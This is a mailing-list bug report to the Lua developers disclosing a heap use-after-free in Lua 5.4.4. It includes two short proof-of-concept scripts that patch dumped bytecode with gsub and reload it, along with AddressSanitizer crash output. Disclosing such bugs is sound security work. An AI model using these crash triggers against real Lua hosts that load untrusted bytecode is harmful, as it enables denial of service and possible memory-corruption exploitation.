lua-users home
lua-l archive

[Date Prev][Date Next][Thread Prev][Thread Next] [Date Index] [Thread Index]


Hi,

A heap use after free is detected in lua (version 5.4.4, git commit: 5d708c3f9cae12820e415d4f89c9eacbe2ab964b. The release version 5.4.4 is also affected.)

poc.lua:
---
maybe = string.dump(function() return ({[tr_e]=true})[true] end)
maybe = maybe:gsub('\1\1',']1\2')
maybe = load(maybe)()
---

When building with -fsanitize=address and execute "./lua poc.lua", we have the following crash info:
---
=================================================================
==3588130==ERROR: AddressSanitizer: heap-use-after-free on address 0x6170000006d8 at pc 0x5555556d08fa bp 0x7fffffffd490 sp 0x7fffffffd488
READ of size 1 at 0x6170000006d8 thread T0
    #0 0x5555556d08f9 in luaV_execute lua_fuzz/lua/lvm.c:1326:13
    #1 0x5555556739f5 in ccall lua/ldo.c:641:5
    #2 0x5555556739f5 in luaD_callnoyield lua/ldo.c:659:3
    #3 0x55555566e68c in luaD_rawrunprotected lua/ldo.c:144:3
    #4 0x5555556753f4 in luaD_pcall  lua/ldo.c:957:12
    #5 0x55555565e6da in lua_pcallk  lua/lapi.c:1064:14
    #6 0x55555564fdc3 in docall  lua/lua.c:160:12
    #7 0x55555564ef32 in handle_script  lua/lua.c:256:14
    #8 0x55555564ef32 in pmain  lua/lua.c:645:9
---

Without asan it prints the following:
---
./lua/lua: ./poc.lua:1: table index is nil
stack traceback:
        ./poc.lua:1: in function <./poc.lua:1>
        ./poc.lua:3: in main chunk
        [C]: in ?
---

A variant poc can trigger a crash in default build without asan:
---
ma0be=string.dump(
    function()
        return({[e]=true})[true]end)
ma0be=ma0be:gsub('\1\1','')
m=load(ma0be)((0)and 0)
---

--
Best Wishes,
Yongheng Chen